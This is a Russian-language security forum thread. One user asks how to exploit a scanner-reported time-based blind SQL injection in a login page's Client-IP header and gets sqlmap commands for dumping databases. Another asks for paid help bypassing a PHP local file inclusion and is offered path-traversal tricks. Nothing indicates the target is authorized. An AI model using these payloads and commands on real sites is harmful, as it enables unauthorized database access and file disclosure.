HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #2761  
Старый 05.02.2020, 18:01
Andrey979
Guest
Сообщений: n/a
Провел на форуме:
9189

Репутация: 0
По умолчанию

Сканирую сканером сайт. Сегодня акунетикс выдал такой лог

Код:
Code:
The vulnerability affects http://www.site.com/login.php , Client-IP

Discovered by /Scripts/PerScheme/Blind_Sql_Injection.script

Attack details

HTTP Header input Client-IP was set to 0"XOR(if(now()=sysdate(),sleep(0),0))XOR"Z

Tests performed:

    0"XOR(if(now()=sysdate(),sleep(3),0))XOR"Z => 3.943
    0"XOR(if(now()=sysdate(),sleep(0),0))XOR"Z => 0.737
    0"XOR(if(now()=sysdate(),sleep(6),0))XOR"Z => 6.765
    0"XOR(if(now()=sysdate(),sleep(9),0))XOR"Z => 9.925
    0"XOR(if(now()=sysdate(),sleep(0),0))XOR"Z => 0.727
    0"XOR(if(now()=sysdate(),sleep(0),0))XOR"Z => 0.741
    0"XOR(if(now()=sysdate(),sleep(0),0))XOR"Z => 0.756
    0"XOR(if(now()=sysdate(),sleep(6),0))XOR"Z => 6.85
    0"XOR(if(now()=sysdate(),sleep(0),0))XOR"Z => 0.718
HTTP request

GET /login.php HTTP/1.1
Referer: https://www.google.com/search?hl=en&q=testing
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Client-IP: 0"XOR(if(now()=sysdate(),sleep(0),0))XOR"Z
Пишет Blind SQL. Как крутить такое?
 
Ответить с цитированием

  #2762  
Старый 05.02.2020, 18:34
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию

Цитата:
Сообщение от Andrey979  
Andrey979 said:

Сканирую сканером сайт. Сегодня акунетикс выдал такой лог
Код:
Code:
The vulnerability affects http://www.site.com/login.php , Client-IP

Discovered by /Scripts/PerScheme/Blind_Sql_Injection.script

Attack details

HTTP Header input Client-IP was set to 0"XOR(if(now()=sysdate(),sleep(0),0))XOR"Z

Tests performed:

    0"XOR(if(now()=sysdate(),sleep(3),0))XOR"Z => 3.943
    0"XOR(if(now()=sysdate(),sleep(0),0))XOR"Z => 0.737
    0"XOR(if(now()=sysdate(),sleep(6),0))XOR"Z => 6.765
    0"XOR(if(now()=sysdate(),sleep(9),0))XOR"Z => 9.925
    0"XOR(if(now()=sysdate(),sleep(0),0))XOR"Z => 0.727
    0"XOR(if(now()=sysdate(),sleep(0),0))XOR"Z => 0.741
    0"XOR(if(now()=sysdate(),sleep(0),0))XOR"Z => 0.756
    0"XOR(if(now()=sysdate(),sleep(6),0))XOR"Z => 6.85
    0"XOR(if(now()=sysdate(),sleep(0),0))XOR"Z => 0.718
HTTP request

GET /login.php HTTP/1.1
Referer: https://www.google.com/search?hl=en&q=testing
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Client-IP: 0"XOR(if(now()=sysdate(),sleep(0),0))XOR"Z
Пишет Blind SQL. Как крутить такое?
Логично как пишет, Blind SQL! Попробуйте через SqlMap c параметрами --technique=B --level=5 --risk=3
 
Ответить с цитированием

  #2763  
Старый 05.02.2020, 19:18
Andrey979
Guest
Сообщений: n/a
Провел на форуме:
9189

Репутация: 0
По умолчанию

Цитата:
Сообщение от winstrool  
winstrool said:

Логично как
пишет, Blind SQL
! Попробуйте через SqlMap c параметрами --technique=B --level=5 --risk=3
Я не совсем понял как правильно скормить запрос мапу..

sqlmap -u http://www.site.com/login.php --technique=B --level=5 --dbs так?
 
Ответить с цитированием

  #2764  
Старый 05.02.2020, 19:37
BabaDook
Guest
Сообщений: n/a
Провел на форуме:
238786

Репутация: 40
По умолчанию

Цитата:
Сообщение от Andrey979  
Andrey979 said:

Я не совсем понял как правильно скормить запрос мапу..
sqlmap -u
http://www.site.com/login.php
--technique=B --level=5 --dbs так?
sqlmap -u http://www.site.com/login.php --technique=B --level=5 --dbs --form
 
Ответить с цитированием

  #2765  
Старый 06.02.2020, 01:12
BabaDook
Guest
Сообщений: n/a
Провел на форуме:
238786

Репутация: 40
По умолчанию

Цитата:
Сообщение от ci0b2n1feec  
ci0b2n1feec said:

Есть уязвимый код
```
include(DB_DIR . '/lang/' . $global_arr['id'] . '.php');
```
Как видете LFI
PHP 5.3.8 %00 не помог, за помощь готов финансово отблагодарить!
Ты уже задавал данный вопрос. Вариантов не так много

./ .\ \\ // ? /[…]//
 
Ответить с цитированием

  #2766  
Старый 06.02.2020, 01:38
ci0b2n1feec
Guest
Сообщений: n/a
Провел на форуме:
6588

Репутация: 0
По умолчанию

Цитата:
Сообщение от BabaDook  
BabaDook said:

Ты уже задавал данный вопрос. Вариантов не так много
./ .\ \\ // ? /[…]//
пробовал нечего не помогло
 
Ответить с цитированием

  #2767  
Старый 06.02.2020, 10:48
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию

Цитата:
Сообщение от ci0b2n1feec  
ci0b2n1feec said:

Есть уязвимый код
```
include(DB_DIR . '/lang/' . $global_arr['id'] . '.php');
```
Как видете LFI
PHP 5.3.8 %00 не помог, за помощь готов финансово отблагодарить!
Изучить движок, исходники, возможно есть другие файлы, которые не доступны с вэба, но в них есть баги, проинклудить их...
 
Ответить с цитированием

  #2768  
Старый 06.02.2020, 12:05
ci0b2n1feec
Guest
Сообщений: n/a
Провел на форуме:
6588

Репутация: 0
По умолчанию

Цитата:
Сообщение от winstrool  
winstrool said:

Изучить движок, исходники, возможно есть другие файлы, которые не доступны с вэба, но в них есть баги, проинклудить их...
Это тоже пробовали, нечего интересного) Интересует что то типо NULL байт, как было в старых версиях
 
Ответить с цитированием

  #2769  
Старый 06.02.2020, 15:43
Andrey979
Guest
Сообщений: n/a
Провел на форуме:
9189

Репутация: 0
По умолчанию

Цитата:
Сообщение от winstrool  
winstrool said:

Логично как
пишет, Blind SQL
! Попробуйте через SqlMap c параметрами --technique=B --level=5 --risk=3
Еще хотел спросить. А в GET запросе можно мапу задать уязвимый параметр, чтобы он по нему шел? В POST можно, а с GET возможно? Акунетикс выдаёт этот параметр - Client-IP
 
Ответить с цитированием

  #2770  
Старый 06.02.2020, 16:11
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию

Цитата:
Сообщение от Andrey979  
Andrey979 said:

Еще хотел спросить. А в GET запросе можно мапу задать уязвимый параметр, чтобы он по нему шел? В POST можно, а с GET возможно? Акунетикс выдаёт этот параметр - Client-IP
Там где угодно можно задать, тут с подобными вопросами вам уже в ветку

Вопросы по SQLMap
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ